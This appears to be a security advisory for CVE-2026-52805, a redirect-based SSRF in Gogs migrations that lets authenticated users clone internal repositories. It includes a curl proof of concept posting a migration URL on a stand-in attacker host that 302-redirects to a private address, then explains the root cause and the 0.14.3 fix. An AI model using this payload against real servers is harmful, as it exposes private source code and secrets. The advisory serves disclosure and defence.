high · 8.7CVE-2026-52805Jun 26, 2026

CVE-2026-52805: Gogs Migration Redirect Bypass SSRF (Internal Repository Theft)

Rohit Hatagale
AI Security Researcher, SecureLayer7

Gogs lets any authenticated user steal internal Git repositories by submitting a migration URL that redirects to a private network address, bypassing the hostname blocklist because only the initial UR

Packagegogs.io/gogs
Ecosystemgo
Affected< 0.14.3
Fixed in0.14.3
CVE-2026-52805: Gogs Migration Redirect Bypass SSRF (Internal Repository Theft)

The problem

The migration endpoint in `internal/form/repo.go` runs `ParseRemoteAddr()` to block private-network hostnames before cloning. However, the actual clone is done with `git clone --mirror` in `internal/database/repo.go`, and Git follows HTTP redirects transparently.

Because redirect targets are never revalidated, an attacker can pass a public hostname at submission time, then have their server issue a 302 to any internal address (127.0.0.1, 10.x, 192.168.x). The cloned content lands in an attacker-controlled repository, exposing source code and secrets from internal services.

Proof of concept

bash
# Step 1: direct localhost URL is blocked
curl -sS -X POST -H "Authorization: token ${TOKEN}" \
  -H "Content-Type: application/json" \
  --data '{"clone_addr":"http://127.0.0.1:18081/victim/private.git","uid":2,"repo_name":"blocked"}' \
  "${GOGS_URL}/api/v1/repos/migrate"
# Result: rejected

# Step 2: public URL that 302-redirects to the blocked internal endpoint
curl -sS -X POST -H "Authorization: token ${TOKEN}" \
  -H "Content-Type: application/json" \
  --data '{"clone_addr":"http://attacker.example/redirect.git","uid":2,"repo_name":"stolen","private":true}' \
  "${GOGS_URL}/api/v1/repos/migrate"
# Result: migration succeeds, new repo contains internal repo contents

The root cause is a TOCTOU gap: validation happens on the user-supplied URL, but execution (git clone --mirror) operates on whatever endpoint Git ends up at after following redirects. CWE-918 (SSRF) applies directly. The patch at commit b9a0093 (PR #8324) adds post-redirect revalidation so that the final destination hostname is checked against the same private-network blocklist as the initial URL.

The fix also addresses stale host validation on stored mirror URLs used during recurring sync, closing a related vector in the Mirror Settings flow.

The fix

Upgrade to Gogs 0.14.3 or later. The patch adds redirect-aware validation so every redirect target is checked against the private-network blocklist before Git follows it. If you cannot upgrade immediately, restrict repository migration to admin-only accounts and disable open user registration (DISABLE_REGISTRATION = true in app.ini).

Reporter not attributed.

References: [1][2][3][4][5]